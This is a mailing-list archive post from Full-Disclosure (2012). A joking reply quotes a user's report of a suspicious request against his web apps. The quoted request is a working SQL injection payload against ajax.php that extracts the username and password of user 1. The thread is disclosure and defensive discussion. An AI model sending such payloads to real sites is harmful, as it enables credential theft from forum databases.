'Re: [Full-disclosure] New Ajax SQL Injection Exploit?'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] New Ajax SQL Injection Exploit?
From:       Julius_Kivimäki <julius.kivimaki () gmail ! com>
Date:       2012-11-30 21:39:07
Message-ID: CAPMrQTSXJNiTxBJArZ2XHkAnAFVNqTqmrOGm-GN5yYW=1b6YXQ () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Dear all, I'd like to inform you that this exploit is vulnerable to a *
critical* XSS attack that can be used against users of the exploit.
Vendor did not respond to inquiries regarding this *severe* vulnerability.


Regards,
Hot Acid security research team.

Greetz 2:
Mustlive
Vulnerability Lab
2012/11/30 eltra1n <larry.wichman@gmail.com>

> I just detected this trying to my web apps a few hours ago:
> 
> GET
> /ajax.php?do=quick_replay&t=7+union+select+1,2,3,concat(0x7a33726f31,username,0x0d0a,password, \
> 0x7a33726f32),5,6,username,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=1-- HTTP/1.1
> Host:www.mysite.c0m:80
> Connection:Close
> 
> I ran a Google search of that string a found this:
> 
> http://pastebin.com/xh9xgep7
> 
> Regards,
> Larry
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 


[Attachment #5 (text/html)]

Dear all, I&#39;d like to inform you that this exploit is vulnerable to a <b>critical</b> XSS \
attack that can be used against users of the exploit. <br>Vendor did not respond to inquiries \
regarding this <b>severe</b> vulnerability. <br> <br><br>Regards,<br>Hot Acid security research \
team.<br><br>Greetz 2:<br>Mustlive<br>Vulnerability Lab<br><div class="gmail_quote">2012/11/30 \
eltra1n <span dir="ltr">&lt;<a href="mailto:larry.wichman@gmail.com" \
target="_blank">larry.wichman@gmail.com</a>&gt;</span><br> <blockquote class="gmail_quote" \
style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">I just detected this \
trying to my web apps a few hours ago:<br> <br>
GET /ajax.php?do=quick_replay&amp;t=7+union+select+1,2,3,concat(0x7a33726f31,username,0x0d0a,pas \
sword,0x7a33726f32),5,6,username,8,9,10,11,12,13,14,15,16,17+from+user+where+userid=1--<br> \
HTTP/1.1<br> Host:www.mysite.c0m:80<br>
Connection:Close<br>
<br>
I ran a Google search of that string a found this:<br>
<br>
<a href="http://pastebin.com/xh9xgep7" target="_blank">http://pastebin.com/xh9xgep7</a><br>
<br>
Regards,<br>
Larry<br>
<br>
_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" \
target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br> Hosted and \
sponsored by Secunia - <a href="http://secunia.com/" \
target="_blank">http://secunia.com/</a><br> </blockquote></div><br>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic